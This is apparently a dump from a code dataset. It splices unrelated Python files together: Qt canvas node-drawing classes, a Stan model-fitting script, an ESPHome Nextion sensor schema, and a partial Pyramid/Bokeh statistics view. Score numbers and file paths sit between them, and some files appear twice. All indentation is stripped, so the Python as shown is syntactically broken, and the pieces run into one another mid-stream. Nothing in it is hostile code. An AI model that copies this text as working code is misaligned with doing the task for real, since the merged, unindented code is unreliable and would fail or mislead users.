self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def anchorPath(self):
"""
Return the anchor path (:class:`QPainterPath`). This is a curve on
which the anchor points lie.
"""
return self.__anchorPath
def setAnchored(self, anchored):
"""
Set the items anchored state. When ``False`` the item draws it self
with a dotted stroke.
"""
self.anchored = anchored
if anchored:
self.setPath(self.__fullStroke)
self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def setConnectionHint(self, hint=None):
"""
Set the connection hint. This can be used to indicate if
a connection can be made or not.
"""
raise NotImplementedError
def count(self):
"""
Return the number of anchor points.
"""
return len(self.__points)
def addAnchor(self, anchor, position=0.5):
"""
Add a new :class:`AnchorPoint` to this item and return it's index.
The `position` specifies where along the `anchorPath` is the new
point inserted.
"""
return self.insertAnchor(self.count(), anchor, position)
def insertAnchor(self, index, anchor, position=0.5):
"""
Insert a new :class:`AnchorPoint` at `index`.
See also
--------
NodeAnchorItem.addAnchor
"""
if anchor in self.__points:
raise ValueError("%s already added." % anchor)
self.__points.insert(index, anchor)
self.__pointPositions.insert(index, position)
anchor.setParentItem(self)
anchor.setPos(self.__anchorPath.pointAtPercent(position))
anchor.destroyed.connect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return index
def removeAnchor(self, anchor):
"""
Remove and delete the anchor point.
"""
anchor = self.takeAnchor(anchor)
anchor.hide()
anchor.setParentItem(None)
anchor.deleteLater()
def takeAnchor(self, anchor):
"""
Remove the anchor but don't delete it.
"""
index = self.__points.index(anchor)
del self.__points[index]
del self.__pointPositions[index]
anchor.destroyed.disconnect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return anchor
def __onAnchorDestroyed(self, anchor):
try:
index = self.__points.index(anchor)
except ValueError:
return
del self.__points[index]
del self.__pointPositions[index]
def anchorPoints(self):
"""
Return a list of anchor points.
"""
return list(self.__points)
def anchorPoint(self, index):
"""
Return the anchor point at `index`.
"""
return self.__points[index]
def setAnchorPositions(self, positions):
"""
Set the anchor positions in percentages (0..1) along the path curve.
"""
if self.__pointPositions != positions:
self.__pointPositions = list(positions)
self.__updatePositions()
def anchorPositions(self):
"""
Return the positions of anchor points as a list of floats where
each float is between 0 and 1 and specifies where along the anchor
path does the point lie (0 is at start 1 is at the end).
"""
return list(self.__pointPositions)
def shape(self):
if self.__shape is not None:
return self.__shape
else:
return GraphicsPathObject.shape(self)
def hoverEnterEvent(self, event):
self.shadow.setEnabled(True)
return GraphicsPathObject.hoverEnterEvent(self, event)
def hoverLeaveEvent(self, event):
self.shadow.setEnabled(False)
return GraphicsPathObject.hoverLeaveEvent(self, event)
def __updatePositions(self):
"""Update anchor points positions.
"""
for point, t in zip(self.__points, self.__pointPositions):
pos = self.__anchorPath.pointAtPercent(t)
point.setPos(pos)
class SourceAnchorItem(NodeAnchorItem):
"""
A source anchor item
"""
pass
class SinkAnchorItem(NodeAnchorItem):
"""
A sink anchor item.
"""
pass
def standard_icon(standard_pixmap):
"""
Return return the application style's standard icon for a
`QStyle.StandardPixmap`.
"""
style = QApplication.instance().style()
return style.standardIcon(standard_pixmap)
class GraphicsIconItem(QGraphicsItem):
"""
A graphics item displaying an :class:`QIcon`.
"""
def __init__(self, parent=None, icon=None, iconSize=None, **kwargs):
QGraphicsItem.__init__(self, parent, **kwargs)
self.setFlag(QGraphicsItem.ItemUsesExtendedStyleOption, True)
if icon is None:
icon = QIcon()
if iconSize is None:
style = QApplication.instance().style()
size = style.pixelMetric(style.PM_LargeIconSize)
iconSize = QSize(size, size)
self.__transformationMode = Qt.SmoothTransformation
self.__iconSize = QSize(iconSize)
self.__icon = QIcon(icon)
def setIcon(self, icon):
"""
Set the icon (:class:`QIcon`).
"""
if self.__icon != icon:
self.__icon = QIcon(icon)
self.update()
def icon(self):
"""
Return the icon (:class:`QIcon`).
"""
return QIcon(self.__icon)
def setIconSize(self, size):
"""
Set the icon (and this item's) size (:class:`QSize`).
"""
if self.__iconSize != size:
self.prepareGeometryChange()
self.__iconSize = QSize(size)
self.update()
def iconSize(self):
"""
Return the icon size (:class:`QSize`).
"""
return QSize(self.__iconSize)
def setTransformationMode(self, mode):
"""
Set pixmap transformation mode. (`Qt.SmoothTransformation` or
`Qt.FastTransformation`).
"""
if self.__transformationMode != mode:
self.__transformationMode = mode
self.update()
def transformationMode(self):
"""
Return the pixmap transformation mode.
"""
return self.__transformationMode
def boundingRect(self):
return QRectF(0, 0, self.__iconSize.width(), self.__iconSize.height())
def paint(self, painter, option, widget=None):
if not self.__icon.isNull():
if option.state & QStyle.State_Selected:
mode = QIcon.Selected
elif option.state & QStyle.State_Enabled:
mode = QIcon.Normal
elif option.state & QStyle.State_Active:
mode = QIcon.Active
else:
mode = QIcon.Disabled
w, h = self.__iconSize.width(), self.__iconSize.height()
target = QRect(0, 0, w, h)
painter.setRenderHint(
QPainter.SmoothPixmapTransform,
self.__transformationMode == Qt.SmoothTransformation,
)
self.__icon.paint(painter, target, Qt.AlignCenter, mode)
class NameTextItem(QGraphicsTextItem):
def __init__(self, *args, **kwargs):
super(NameTextItem, self).__init__(*args, **kwargs)
self.__selected = False
self.__palette = None
self.__content = ""
def paint(self, painter, option, widget=None):
if self.__selected:
painter.save()
painter.setPen(QPen(Qt.NoPen))
painter.setBrush(self.palette().color(QPalette.Highlight))
doc = self.document()
margin = doc.documentMargin()
painter.translate(margin, margin)
offset = min(margin, 2)
for line in self._lines(doc):
rect = line.naturalTextRect()
painter.drawRoundedRect(
rect.adjusted(-offset, -offset, offset, offset), 3, 3
)
painter.restore()
super(NameTextItem, self).paint(painter, option, widget)
def _blocks(self, doc):
block = doc.begin()
while block != doc.end():
yield block
block = block.next()
def _lines(self, doc):
for block in self._blocks(doc):
blocklayout = block.layout()
for i in range(blocklayout.lineCount()):
yield blocklayout.lineAt(i)
def setSelectionState(self, state):
if self.__selected != state:
self.__selected = state
self.__updateDefaultTextColor()
self.update()
def setPalette(self, palette):
if self.__palette != palette:
self.__palette = QPalette(palette)
self.__updateDefaultTextColor()
self.update()
def palette(self):
if self.__palette is None:
scene = self.scene()
if scene is not None:
return scene.palette()
else:
return QPalette()
else:
return QPalette(self.__palette)
def __updateDefaultTextColor(self):
if self.__selected:
role = QPalette.HighlightedText
else:
role = QPalette.WindowText
self.setDefaultTextColor(self.palette().color(role))
def setHtml(self, contents):
if contents != self.__content:
self.__content = contents
super().setHtml(contents)
class NodeItem(QGraphicsWidget):
"""
An widget node item in the canvas.
"""
#: Signal emitted when the scene position of the node has changed.
positionChanged = Signal()
#: Signal emitted when the geometry of the channel anchors changes.
anchorGeometryChanged = Signal()
#: Signal emitted when the item has been activated (by a mouse double
#: click or a keyboard)
activated = Signal()
#: The item is under the mouse.
hovered = Signal()
#: Span of the anchor in degrees
ANCHOR_SPAN_ANGLE = 90
#: Z value of the item
Z_VALUE = 100
def __init__(self, widget_description=None, parent=None, **kwargs):
self.__boundingRect = None
super().__init__(parent, **kwargs)
self.setFocusPolicy(Qt.ClickFocus)
self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.setFlag(QGraphicsItem.ItemIsSelectable, True)
self.setFlag(QGraphicsItem.ItemIsMovable, True)
self.setFlag(QGraphicsItem.ItemIsFocusable, True)
# central body shape item
self.shapeItem = None
# in/output anchor items
self.inputAnchorItem = None
self.outputAnchorItem = None
# title text item
self.captionTextItem = None
# error, warning, info items
self.errorItem = None
self.warningItem = None
self.infoItem = None
self.__title = ""
self.__processingState = 0
self.__progress = -1
self.__statusMessage = ""
self.__error = None
self.__warning = None
self.__info = None
self.__anchorLayout = None
self.__animationEnabled = False
self.setZValue(self.Z_VALUE)
self.setupGraphics()
self.setWidgetDescription(widget_description)
@classmethod
def from_node(cls, node):
"""
Create an :class:`NodeItem` instance and initialize it from a
:class:`SchemeNode` instance.
"""
self = cls()
self.setWidgetDescription(node.description)
# self.setCategoryDescription(node.category)
return self
@classmethod
def from_node_meta(cls, meta_description):
"""
Create an `NodeItem` instance from a node meta description.
"""
self = cls()
self.setWidgetDescription(meta_description)
return self
def setupGraphics(self):
"""
Set up the graphics.
"""
shape_rect = QRectF(-24, -24, 48, 48)
self.shapeItem = NodeBodyItem(self)
self.shapeItem.setShapeRect(shape_rect)
self.shapeItem.setAnimationEnabled(self.__animationEnabled)
# Rect for widget's 'ears'.
anchor_rect = QRectF(-31, -31, 62, 62)
self.inputAnchorItem = SinkAnchorItem(self)
input_path = QPainterPath()
start_angle = 180 - self.ANCHOR_SPAN_ANGLE / 2
input_path.arcMoveTo(anchor_rect, start_angle)
input_path.arcTo(anchor_rect, start_angle, self.ANCHOR_SPAN_ANGLE)
self.inputAnchorItem.setAnchorPath(input_path)
self.outputAnchorItem = SourceAnchorItem(self)
output_path = QPainterPath()
start_angle = self.ANCHOR_SPAN_ANGLE / 2
output_path.arcMoveTo(anchor_rect, start_angle)
output_path.arcTo(anchor_rect, start_angle, -self.ANCHOR_SPAN_ANGLE)
self.outputAnchorItem.setAnchorPath(output_path)
self.inputAnchorItem.hide()
self.outputAnchorItem.hide()
# Title caption item
self.captionTextItem = NameTextItem(self)
self.captionTextItem.setPlainText("")
self.captionTextItem.setPos(0, 33)
def iconItem(standard_pixmap):
item = GraphicsIconItem(
self, icon=standard_icon(standard_pixmap), iconSize=QSize(16, 16)
)
item.hide()
return item
self.errorItem = iconItem(QStyle.SP_MessageBoxCritical)
self.warningItem = iconItem(QStyle.SP_MessageBoxWarning)
self.infoItem = iconItem(QStyle.SP_MessageBoxInformation)
self.prepareGeometryChange()
self.__boundingRect = None
# TODO: Remove the set[Widget|Category]Description. The user should
# handle setting of icons, title, ...
def setWidgetDescription(self, desc):
"""
Set widget description.
"""
self.widget_description = desc
if desc is None:
return
icon = icon_loader.from_description(desc).get(desc.icon)
if icon:
self.setIcon(icon)
if not self.title():
self.setTitle(desc.name)
if desc.inputs:
self.inputAnchorItem.show()
if desc.outputs:
self.outputAnchorItem.show()
tooltip = NodeItem_toolTipHelper(self)
self.setToolTip(tooltip)
def setWidgetCategory(self, desc):
"""
Set the widget category.
"""
self.category_description = desc
if desc and desc.background:
background = NAMED_COLORS.get(desc.background, desc.background)
color = QColor(background)
if color.isValid():
self.setColor(color)
def setIcon(self, icon):
"""
Set the node item's icon (:class:`QIcon`).
"""
if isinstance(icon, QIcon):
self.icon_item = GraphicsIconItem(
self.shapeItem, icon=icon, iconSize=QSize(36, 36)
)
self.icon_item.setPos(-18, -18)
else:
raise TypeError
def setColor(self, color, selectedColor=None):
"""
Set the widget color.
"""
if selectedColor is None:
selectedColor = saturated(color, 150)
palette = create_palette(color, selectedColor)
self.shapeItem.setPalette(palette)
def setTitle(self, title):
"""
Set the node title. The title text is displayed at the bottom of the
node.
"""
self.__title = title
self.__updateTitleText()
def title(self):
"""
Return the node title.
"""
return self.__title
title_ = Property(str, fget=title, fset=setTitle, doc="Node title text.")
def setFont(self, font):
"""
Set the title text font (:class:`QFont`).
"""
if font != self.font():
self.prepareGeometryChange()
self.captionTextItem.setFont(font)
self.__updateTitleText()
def font(self):
"""
Return the title text font.
"""
return self.captionTextItem.font()
def setAnimationEnabled(self, enabled):
"""
Set the node animation enabled state.
"""
if self.__animationEnabled != enabled:
self.__animationEnabled = enabled
self.shapeItem.setAnimationEnabled(enabled)
def animationEnabled(self):
"""
Are node animations enabled.
"""
return self.__animationEnabled
def setProcessingState(self, state):
"""
Set the node processing state i.e. the node is processing
(is busy) or is idle.
"""
if self.__processingState != state:
self.__processingState = state
self.shapeItem.setProcessingState(state)
if not state:
# Clear the progress meter.
self.setProgress(-1)
if self.__animationEnabled:
self.shapeItem.ping()
def processingState(self):
"""
The node processing state.
"""
return self.__processingState
processingState_ = Property(int, fget=processingState, fset=setProcessingState)
def setProgress(self, progress):
"""
Set the node work progress state (number between 0 and 100).
"""
if progress is None or progress < 0 or not self.__processingState:
progress = -1
progress = max(min(progress, 100), -1)
if self.__progress != progress:
self.__progress = progress
self.shapeItem.setProgress(progress)
self.__updateTitleText()
def progress(self):
"""
Return the node work progress state.
"""
return self.__progress
progress_ = Property(
float, fget=progress, fset=setProgress, doc="Node progress state."
)
def setStatusMessage(self, message):
"""
Set the node status message text.
This text is displayed below the node's title.
"""
if self.__statusMessage != message:
self.__statusMessage = message
self.__updateTitleText()
def statusMessage(self):
return self.__statusMessage
def setStateMessage(self, message):
"""
Set a state message to display over the item.
Parameters
----------
message : UserMessage
Message to display. `message.severity` is used to determine
the icon and `message.contents` is used as a tool tip.
"""
# TODO: Group messages by message_id not by severity
# and deprecate set[Error|Warning|Error]Message
if message.severity == UserMessage.Info:
self.setInfoMessage(message.contents)
elif message.severity == UserMessage.Warning:
self.setWarningMessage(message.contents)
elif message.severity == UserMessage.Error:
self.setErrorMessage(message.contents)
def setErrorMessage(self, message):
if self.__error != message:
self.__error = message
self.__updateMessages()
def setWarningMessage(self, message):
if self.__warning != message:
self.__warning = message
self.__updateMessages()
def setInfoMessage(self, message):
if self.__info != message:
self.__info = message
self.__updateMessages()
def newInputAnchor(self):
"""
Create and return a new input :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.inputs):
raise ValueError("Widget has no inputs.")
anchor = AnchorPoint()
self.inputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
return anchor
def removeInputAnchor(self, anchor):
"""
Remove input anchor.
"""
self.inputAnchorItem.removeAnchor(anchor)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
def newOutputAnchor(self):
"""
Create and return a new output :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.outputs):
raise ValueError("Widget has no outputs.")
anchor = AnchorPoint(self)
self.outputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
return anchor
def removeOutputAnchor(self, anchor):
"""
Remove output anchor.
"""
self.outputAnchorItem.removeAnchor(anchor)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
def inputAnchors(self):
"""
Return a list of all input anchor points.
"""
return self.inputAnchorItem.anchorPoints()
def outputAnchors(self):
"""
Return a list of all output anchor points.
"""
return self.outputAnchorItem.anchorPoints()
def setAnchorRotation(self, angle):
"""
Set the anchor rotation.
"""
self.inputAnchorItem.setRotation(angle)
self.outputAnchorItem.setRotation(angle)
self.anchorGeometryChanged.emit()
def anchorRotation(self):
"""
Return the anchor rotation.
"""
return self.inputAnchorItem.rotation()
def boundingRect(self):
# TODO: Important because of this any time the child
# items change geometry the self.prepareGeometryChange()
# needs to be called.
if self.__boundingRect is None:
self.__boundingRect = self.childrenBoundingRect()
return self.__boundingRect
def shape(self):
# Shape for mouse hit detection.
# TODO: Should this return the union of all child items?
return self.shapeItem.shape()
def __updateTitleText(self):
"""
Update the title text item.
"""
text = ['<div align="center">%s' % escape(self.title())]
status_text = []
progress_included = False
if self.__statusMessage:
msg = escape(self.__statusMessage)
format_fields = dict(parse_format_fields(msg))
if "progress" in format_fields and len(format_fields) == 1:
# Insert progress into the status text format string.
spec, _ = format_fields["progress"]
if spec != None:
progress_included = True
progress_str = "{0:.0f}%".format(self.progress())
status_text.append(msg.format(progress=progress_str))
else:
status_text.append(msg)
if self.progress() >= 0 and not progress_included:
status_text.append("%i%%" % int(self.progress()))
if status_text:
text += [
"<br/>",
'<span style="font-style: italic">',
"<br/>".join(status_text),
"</span>",
]
text += ["</div>"]
text = "".join(text)
# The NodeItems boundingRect could change.
self.prepareGeometryChange()
self.__boundingRect = None
self.captionTextItem.setHtml(text)
self.captionTextItem.document().adjustSize()
width = self.captionTextItem.textWidth()
self.captionTextItem.setPos(-width / 2.0, 33)
def __updateMessages(self):
"""
Update message items (position, visibility and tool tips).
"""
items = [self.errorItem, self.warningItem, self.infoItem]
messages = [self.__error, self.__warning, self.__info]
for message, item in zip(messages, items):
item.setVisible(bool(message))
item.setToolTip(message or "")
shown = [item for item in items if item.isVisible()]
count = len(shown)
if count:
spacing = 3
rects = [item.boundingRect() for item in shown]
width = sum(rect.width() for rect in rects)
width += spacing * max(0, count - 1)
height = max(rect.height() for rect in rects)
origin = self.shapeItem.boundingRect().top() - spacing - height
origin = QPointF(-width / 2, origin)
for item, rect in zip(shown, rects):
item.setPos(origin)
origin = origin + QPointF(rect.width() + spacing, 0)
def mousePressEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().mousePressEvent(event)
else:
event.ignore()
def mouseDoubleClickEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
super().mouseDoubleClickEvent(event)
QTimer.singleShot(0, self.activated.emit)
else:
event.ignore()
def contextMenuEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().contextMenuEvent(event)
else:
event.ignore()
def focusInEvent(self, event):
self.shapeItem.setHasFocus(True)
return super().focusInEvent(event)
def focusOutEvent(self, event):
self.shapeItem.setHasFocus(False)
return super().focusOutEvent(event)
def changeEvent(self, event):
if event.type() == QEvent.PaletteChange:
self.__updatePalette()
elif event.type() == QEvent.FontChange:
self.__updateFont()
super().changeEvent(event)
def itemChange(self, change, value):
if change == QGraphicsItem.ItemSelectedChange:
self.shapeItem.setSelected(value)
self.captionTextItem.setSelectionState(value)
elif change == QGraphicsItem.ItemPositionHasChanged:
self.positionChanged.emit()
return super().itemChange(change, value)
def __updatePalette(self):
self.captionTextItem.setPalette(self.palette())
def __updateFont(self):
self.prepareGeometryChange()
self.captionTextItem.setFont(self.font())
self.__updateTitleText()
TOOLTIP_TEMPLATE = """\
<html>
<head>
<style type="text/css">
{style}
</style>
</head>
<body>
{tooltip}
</body>
</html>
"""
def NodeItem_toolTipHelper(node, links_in=[], links_out=[]):
"""
A helper function for constructing a standard tooltip for the node
in on the canvas.
Parameters:
===========
node : NodeItem
The node item instance.
links_in : list of LinkItem instances
A list of input links for the node.
links_out : list of LinkItem instances
A list of output links for the node.
"""
desc = node.widget_description
channel_fmt = "<li>{0}</li>"
title_fmt = "<b>{title}</b><hr/>"
title = title_fmt.format(title=escape(node.title()))
inputs_list_fmt = "Inputs:<ul>{inputs}</ul><hr/>"
outputs_list_fmt = "Outputs:<ul>{outputs}</ul>"
if desc.inputs:
inputs = [channel_fmt.format(inp.name) for inp in desc.inputs]
inputs = inputs_list_fmt.format(inputs="".join(inputs))
else:
inputs = "No inputs<hr/>"
if desc.outputs:
outputs = [channel_fmt.format(out.name) for out in desc.outputs]
outputs = outputs_list_fmt.format(outputs="".join(outputs))
else:
outputs = "No outputs"
tooltip = title + inputs + outputs
style = "ul { margin-top: 1px; margin-bottom: 1px; }"
return TOOLTIP_TEMPLATE.format(style=style, tooltip=tooltip)
def parse_format_fields(format_str):
formatter = string.Formatter()
format_fields = [
(field, (spec, conv))
for _, field, spec, conv in formatter.parse(format_str)
if field is not None
]
return format_fields | 0.662251 | 0.226891 |
import pandas as pd
import pickle
from os.path import join
model_dir = '../../stan_models/models_bin/'
ts_dir = '../time_series/SM/'
res_dir = '../results/SM/'
# Load models
with open(join(model_dir, 'prevalence_model.bin'), 'rb') as f:
prevalence_model = pickle.load(f)
with open(join(model_dir, 'incidence_model.bin'), 'rb') as f:
incidence_model = pickle.load(f)
# Loop over time series and sample from the posterior distribution
for ts_file in ['T50_sigma_0p02',
'T100_sigma_0p02',
'T250_sigma_0p02']:
# Read data as CSV
df = pd.read_csv(join(ts_dir, ts_file + ".txt"), sep='\t')
# Normalize time
t = df['t'] / df['t'].iloc[-1]
# Prepare data dicts
data_prevalence = {'T': len(t),
'ts': t,
'Y': df['Y(t)'],
# Hyperparameters
'scale_sigma': 1,
'scale_gamma': 100,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.1,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
data_incidence = {'T': len(t),
'ts': t,
'Z': df['Z(t)'],
'population': 100000,
'max_Y': 1,
# Hyperparameters
'scale_sigma': 1,
'loc_gamma': 0.1 * df['t'].iloc[-1],
'scale_gamma': 0.1,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.00,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
# Fit with prevalence model and dump results to disk
fit = prevalence_model.sampling(data_prevalence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_prevalence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f)
# Fit with incidence model and dump results to disk
fit = incidence_model.sampling(data_incidence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_incidence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f) | experiments/scripts/sparsity_test.py | import pandas as pd
import pickle
from os.path import join
model_dir = '../../stan_models/models_bin/'
ts_dir = '../time_series/SM/'
res_dir = '../results/SM/'
# Load models
with open(join(model_dir, 'prevalence_model.bin'), 'rb') as f:
prevalence_model = pickle.load(f)
with open(join(model_dir, 'incidence_model.bin'), 'rb') as f:
incidence_model = pickle.load(f)
# Loop over time series and sample from the posterior distribution
for ts_file in ['T50_sigma_0p02',
'T100_sigma_0p02',
'T250_sigma_0p02']:
# Read data as CSV
df = pd.read_csv(join(ts_dir, ts_file + ".txt"), sep='\t')
# Normalize time
t = df['t'] / df['t'].iloc[-1]
# Prepare data dicts
data_prevalence = {'T': len(t),
'ts': t,
'Y': df['Y(t)'],
# Hyperparameters
'scale_sigma': 1,
'scale_gamma': 100,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.1,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
data_incidence = {'T': len(t),
'ts': t,
'Z': df['Z(t)'],
'population': 100000,
'max_Y': 1,
# Hyperparameters
'scale_sigma': 1,
'loc_gamma': 0.1 * df['t'].iloc[-1],
'scale_gamma': 0.1,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.00,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
# Fit with prevalence model and dump results to disk
fit = prevalence_model.sampling(data_prevalence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_prevalence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f)
# Fit with incidence model and dump results to disk
fit = incidence_model.sampling(data_incidence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_incidence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f) | 0.560974 | 0.254231 |
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_COMPONENT_ID,
)
from .. import nextion_ns, CONF_NEXTION_ID
from ..base_component import (
setup_component_core_,
CONFIG_SENSOR_COMPONENT_SCHEMA,
CONF_VARIABLE_NAME,
CONF_COMPONENT_NAME,
CONF_PRECISION,
CONF_WAVE_CHANNEL_ID,
CONF_WAVE_MAX_VALUE,
CONF_WAVEFORM_SEND_LAST_VALUE,
CONF_WAVE_MAX_LENGTH,
)
CODEOWNERS = ["@senexcrenshaw"]
NextionSensor = nextion_ns.class_("NextionSensor", sensor.Sensor, cg.PollingComponent)
def CheckWaveID(value):
value = cv.int_(value)
if value < 0 or value > 3:
raise cv.Invalid(f"Valid range for {CONF_WAVE_CHANNEL_ID} is 0-3")
return value
def _validate(config):
if CONF_WAVE_CHANNEL_ID in config and CONF_COMPONENT_ID not in config:
raise cv.Invalid(
f"{CONF_COMPONENT_ID} is required when {CONF_WAVE_CHANNEL_ID} is set"
)
return config
CONFIG_SCHEMA = cv.All(
sensor.sensor_schema(
NextionSensor,
accuracy_decimals=2,
)
.extend(
{
cv.Optional(CONF_PRECISION, default=0): cv.int_range(min=0, max=8),
cv.Optional(CONF_WAVE_CHANNEL_ID): CheckWaveID,
cv.Optional(CONF_COMPONENT_ID): cv.uint8_t,
cv.Optional(CONF_WAVE_MAX_LENGTH, default=255): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVE_MAX_VALUE, default=100): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVEFORM_SEND_LAST_VALUE, default=True): cv.boolean,
}
)
.extend(CONFIG_SENSOR_COMPONENT_SCHEMA)
.extend(cv.polling_component_schema("never")),
cv.has_exactly_one_key(CONF_COMPONENT_ID, CONF_COMPONENT_NAME, CONF_VARIABLE_NAME),
_validate,
)
async def to_code(config):
hub = await cg.get_variable(config[CONF_NEXTION_ID])
var = cg.new_Pvariable(config[CONF_ID], hub)
await cg.register_component(var, config)
await sensor.register_sensor(var, config)
cg.add(hub.register_sensor_component(var))
await setup_component_core_(var, config, ".val")
if CONF_PRECISION in config:
cg.add(var.set_precision(config[CONF_PRECISION]))
if CONF_COMPONENT_ID in config:
cg.add(var.set_component_id(config[CONF_COMPONENT_ID]))
if CONF_WAVE_CHANNEL_ID in config:
cg.add(var.set_wave_channel_id(config[CONF_WAVE_CHANNEL_ID]))
if CONF_WAVEFORM_SEND_LAST_VALUE in config:
cg.add(var.set_waveform_send_last_value(config[CONF_WAVEFORM_SEND_LAST_VALUE]))
if CONF_WAVE_MAX_VALUE in config:
cg.add(var.set_wave_max_value(config[CONF_WAVE_MAX_VALUE]))
if CONF_WAVE_MAX_LENGTH in config:
cg.add(var.set_wave_max_length(config[CONF_WAVE_MAX_LENGTH])) | esphome/components/nextion/sensor/__init__.py | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_COMPONENT_ID,
)
from .. import nextion_ns, CONF_NEXTION_ID
from ..base_component import (
setup_component_core_,
CONFIG_SENSOR_COMPONENT_SCHEMA,
CONF_VARIABLE_NAME,
CONF_COMPONENT_NAME,
CONF_PRECISION,
CONF_WAVE_CHANNEL_ID,
CONF_WAVE_MAX_VALUE,
CONF_WAVEFORM_SEND_LAST_VALUE,
CONF_WAVE_MAX_LENGTH,
)
CODEOWNERS = ["@senexcrenshaw"]
NextionSensor = nextion_ns.class_("NextionSensor", sensor.Sensor, cg.PollingComponent)
def CheckWaveID(value):
value = cv.int_(value)
if value < 0 or value > 3:
raise cv.Invalid(f"Valid range for {CONF_WAVE_CHANNEL_ID} is 0-3")
return value
def _validate(config):
if CONF_WAVE_CHANNEL_ID in config and CONF_COMPONENT_ID not in config:
raise cv.Invalid(
f"{CONF_COMPONENT_ID} is required when {CONF_WAVE_CHANNEL_ID} is set"
)
return config
CONFIG_SCHEMA = cv.All(
sensor.sensor_schema(
NextionSensor,
accuracy_decimals=2,
)
.extend(
{
cv.Optional(CONF_PRECISION, default=0): cv.int_range(min=0, max=8),
cv.Optional(CONF_WAVE_CHANNEL_ID): CheckWaveID,
cv.Optional(CONF_COMPONENT_ID): cv.uint8_t,
cv.Optional(CONF_WAVE_MAX_LENGTH, default=255): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVE_MAX_VALUE, default=100): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVEFORM_SEND_LAST_VALUE, default=True): cv.boolean,
}
)
.extend(CONFIG_SENSOR_COMPONENT_SCHEMA)
.extend(cv.polling_component_schema("never")),
cv.has_exactly_one_key(CONF_COMPONENT_ID, CONF_COMPONENT_NAME, CONF_VARIABLE_NAME),
_validate,
)
async def to_code(config):
hub = await cg.get_variable(config[CONF_NEXTION_ID])
var = cg.new_Pvariable(config[CONF_ID], hub)
await cg.register_component(var, config)
await sensor.register_sensor(var, config)
cg.add(hub.register_sensor_component(var))
await setup_component_core_(var, config, ".val")
if CONF_PRECISION in config:
cg.add(var.set_precision(config[CONF_PRECISION]))
if CONF_COMPONENT_ID in config:
cg.add(var.set_component_id(config[CONF_COMPONENT_ID]))
if CONF_WAVE_CHANNEL_ID in config:
cg.add(var.set_wave_channel_id(config[CONF_WAVE_CHANNEL_ID]))
if CONF_WAVEFORM_SEND_LAST_VALUE in config:
cg.add(var.set_waveform_send_last_value(config[CONF_WAVEFORM_SEND_LAST_VALUE]))
if CONF_WAVE_MAX_VALUE in config:
cg.add(var.set_wave_max_value(config[CONF_WAVE_MAX_VALUE]))
if CONF_WAVE_MAX_LENGTH in config:
cg.add(var.set_wave_max_length(config[CONF_WAVE_MAX_LENGTH])) | 0.398055 | 0.075483 |
from pyramid.view import view_config
from pyramid.httpexceptions import HTTPUnauthorized
from ..models import Association, Account
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot
from bokeh.embed import components
from bokeh.palettes import Spectral6, Spectral5
from bokeh.transform import factor_cmap
import pandas as pd
import numpy as np
@view_config(route_name='stat', renderer='../templates/stat.jinja2',
request_method='GET')
def stat_view(request):
"""View statistics scraped from indeed."""
try:
query = request.dbsession.query(Account)
admin = query.filter(
Account.username == request.authenticated_userid).one_or_none()
if admin.admin is True:
# From here, down to next comment, is data we've tracked but
# decided not to render.
relationships = request.dbsession.query(Association)
count = {}
for each in relationships:
word = each.keyword_id
if word not in count:
count[word] = 1
else:
count[word] += 1
top = 1
for value in count.values():
if top <= value:
top = value * 1.5
users = list(count.values())
keywords = list(count.keys())
source = ColumnDataSource(
data=dict(keywords=keywords, users=users))
p = figure(x_range=keywords, y_range=(0, top), plot_height=500,
title="Current Stored Searches")
p.vbar(x='keywords', top='users', width=0.9, legend=False,
source=source)
